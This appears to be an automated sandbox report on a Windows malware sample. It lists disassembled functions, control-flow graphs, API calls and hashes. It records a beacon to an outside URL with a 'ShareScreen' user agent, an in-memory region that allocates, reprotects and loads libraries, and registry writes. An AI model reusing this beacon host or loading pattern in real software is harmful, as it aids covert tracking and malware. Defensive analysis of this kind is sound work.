                                                                                                                                                                                                                                                                                      control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 94 43d35e-43d364 83->94 84->83 92 43d162-43d16b GetFileType 85->92 93 43d0f7-43d100 85->93 98 43d1b4-43d1b7 92->98 99 43d16d-43d19e GetLastError call 42ea93 CloseHandle 92->99 96 43d102-43d106 93->96 97 43d137-43d15d GetLastError call 42ea93 93->97 96->97 103 43d108-43d135 call 43cd0a 96->103 97->83 101 43d1c0-43d1c6 98->101 102 43d1b9-43d1be 98->102 99->83 113 43d1a4-43d1af call 42eac9 99->113 106 43d1ca-43d218 call 4396c7 101->106 107 43d1c8 101->107 102->106 103->92 103->97 117 43d21a-43d226 call 43cf1b 106->117 118 43d228-43d24c call 43cabd 106->118 107->106 113->83 117->118 123 43d250-43d25a call 4335cd 117->123 124 43d25f-43d2a2 118->124 125 43d24e 118->125 123->94 127 43d2c3-43d2d1 124->127 128 43d2a4-43d2a8 124->128 125->123 131 43d2d7-43d2db 127->131 132 43d35c 127->132 128->127 130 43d2aa-43d2be 128->130 130->127 131->132 133 43d2dd-43d310 CloseHandle call 43cd0a 131->133 132->94 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->132
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0043D150
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0043D312
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                      • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                                      • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A
                                                                                                                                                                                                                                                                                      Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 161 4332d5 144->161 146->147 150 432f67-432f92 146->150 166 4332d0 call 42a59d 147->166 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->166 159 432fc3-432fc7 157->159 160 4332b9-4332bb 157->160 159->160 165 432fcd-432fd1 159->165 163 4332d8-4332dd 160->163 161->163 165->156 168 432fd3-432fea 165->168 166->161 171 433007-433010 168->171 172 432fec-432fef 168->172 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 171->175 176 43302e-433038 171->176 173 432ff1-432ff7 172->173 174 432ff9-433002 172->174 173->174 173->175 179 4330a3-4330bd 174->179 206 4331f0 175->206 177 43303a-43303c 176->177 178 43303f-43305d call 4336a7 call 43346a * 2 176->178 177->178 215 43307a-4330a0 call 4347ee 178->215 216 43305f-433075 call 42eac9 call 42eab6 178->216 181 4330c3-4330d3 179->181 182 433191-43319a call 43d365 179->182 181->182 185 4330d9-4330db 181->185 193 43320d 182->193 194 43319c-4331ae 182->194 185->182 191 4330e1-433107 185->191 191->182 196 43310d-433120 191->196 202 433211-433229 ReadFile 193->202 194->193 198 4331b0-4331bf GetConsoleMode 194->198 196->182 200 433122-433124 196->200 198->193 205 4331c1-4331c5 198->205 200->182 207 433126-433151 200->207 203 433285-433290 GetLastError 202->203 204 43322b-433231 202->204 209 433292-4332a4 call 42eac9 call 42eab6 203->209 210 4332a9-4332ac 203->210 204->203 211 433233 204->211 205->202 212 4331c7-4331e1 ReadConsoleW 205->212 213 4331f3-4331fd call 43346a 206->213 207->182 214 433153-433166 207->214 209->206 222 4332b2-4332b4 210->222 223 4331e9-4331ef call 42ea93 210->223 218 433236-433248 211->218 220 4331e3 GetLastError 212->220 221 433202-43320b 212->221 213->163 214->182 225 433168-43316a 214->225 215->179 216->206 218->213 228 43324a-43324e 218->228 220->223 221->218 222->213 223->206 225->182 232 43316c-43318c 225->232 235 433250-433260 call 432c45 228->235 236 433267-433272 228->236 232->182 247 433263-433265 235->247 242 433274 call 432d95 236->242 243 43327e-433283 call 432a85 236->243 248 433279-43327c 242->248 243->248 247->213 248->247
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                                      • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69
                                                                                                                                                                                                                                                                                      Function 024C003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 250 24c003c-24c0047 251 24c004c-24c0263 call 24c0a3f call 24c0e0f call 24c0d90 VirtualAlloc 250->251 252 24c0049 250->252 267 24c028b-24c0292 251->267 268 24c0265-24c0289 call 24c0a69 251->268 252->251 270 24c02a1-24c02b0 267->270 272 24c02ce-24c03c2 VirtualProtect call 24c0cce call 24c0ce7 268->272 270->272 273 24c02b2-24c02cc 270->273 279 24c03d1-24c03e0 272->279 273->270 280 24c0439-24c04b8 VirtualFree 279->280 281 24c03e2-24c0437 call 24c0ce7 279->281 283 24c04be-24c04cd 280->283 284 24c05f4-24c05fe 280->284 281->279 286 24c04d3-24c04dd 283->286 287 24c077f-24c0789 284->287 288 24c0604-24c060d 284->288 286->284 292 24c04e3-24c0505 LoadLibraryA 286->292 290 24c078b-24c07a3 287->290 291 24c07a6-24c07b0 287->291 288->287 293 24c0613-24c0637 288->293 290->291 294 24c086e-24c08be LoadLibraryA 291->294 295 24c07b6-24c07cb 291->295 296 24c0517-24c0520 292->296 297 24c0507-24c0515 292->297 298 24c063e-24c0648 293->298 302 24c08c7-24c08f9 294->302 299 24c07d2-24c07d5 295->299 300 24c0526-24c0547 296->300 297->300 298->287 301 24c064e-24c065a 298->301 303 24c0824-24c0833 299->303 304 24c07d7-24c07e0 299->304 305 24c054d-24c0550 300->305 301->287 306 24c0660-24c066a 301->306 307 24c08fb-24c0901 302->307 308 24c0902-24c091d 302->308 314 24c0839-24c083c 303->314 309 24c07e4-24c0822 304->309 310 24c07e2 304->310 311 24c0556-24c056b 305->311 312 24c05e0-24c05ef 305->312 313 24c067a-24c0689 306->313 307->308 309->299 310->303 315 24c056d 311->315 316 24c056f-24c057a 311->316 312->286 317 24c068f-24c06b2 313->317 318 24c0750-24c077a 313->318 314->294 319 24c083e-24c0847 314->319 315->312 321 24c057c-24c0599 316->321 322 24c059b-24c05bb 316->322 323 24c06ef-24c06fc 317->323 324 24c06b4-24c06ed 317->324 318->298 325 24c0849 319->325 326 24c084b-24c086c 319->326 333 24c05bd-24c05db 321->333 322->333 327 24c06fe-24c0748 323->327 328 24c074b 323->328 324->323 325->294 326->314 327->328 328->313 333->305
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024C024D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                      • Instruction ID: fc6d8bf3b30f58ecec1e8ce670d687e404b49ad6cec5627aabf533009412aab4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D526C74A01229DFDBA4CF58C984BADBBB1BF09304F1480DAE54DAB351DB30AA95CF14
                                                                                                                                                                                                                                                                                      Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                                                                                                                                                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                                                                                      • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                                      • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                                                                                      • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                                      • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E
                                                                                                                                                                                                                                                                                      Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1687354797-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                                      • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9
                                                                                                                                                                                                                                                                                      Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                                                                                                                                                                                                                                      • __Cnd_signal.LIBCPMT ref: 00405828
                                                                                                                                                                                                                                                                                      • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                                                                                                                                                                                                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                                      • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D
                                                                                                                                                                                                                                                                                      Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                                                      • String ID: F(@
                                                                                                                                                                                                                                                                                      • API String ID: 1611280651-2698495834
                                                                                                                                                                                                                                                                                      • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                                                      • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C
                                                                                                                                                                                                                                                                                      Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 452 42e185-42e188 436->452 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 445 42e178-42e184 call 42e03d 443->445 447 42e189-42e18e 444->447 448 42e169-42e175 GetLastError call 42ea93 444->448 445->452 450 42e190-42e193 447->450 451 42e195-42e197 447->451 448->443 450->451 451->445
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0042E170
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2744730728-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                                                                      • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8
                                                                                                                                                                                                                                                                                      Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 466 43477a-43477e 460->466 465 4347b3-4347c8 462->465 462->466 463->466 469 4347cd-4347d2 465->469 466->469
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043479F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                                                      • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98
                                                                                                                                                                                                                                                                                      Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                                                                                                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1818849710-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                                                      • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664
                                                                                                                                                                                                                                                                                      Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 487 42e0bc-42e0be 484->487 485->484 486 42e0ad-42e0ae CloseHandle 485->486 486->484 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0042E086
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                                                                                                                                                                                                      • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1198197534-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                                      • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659
                                                                                                                                                                                                                                                                                      Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
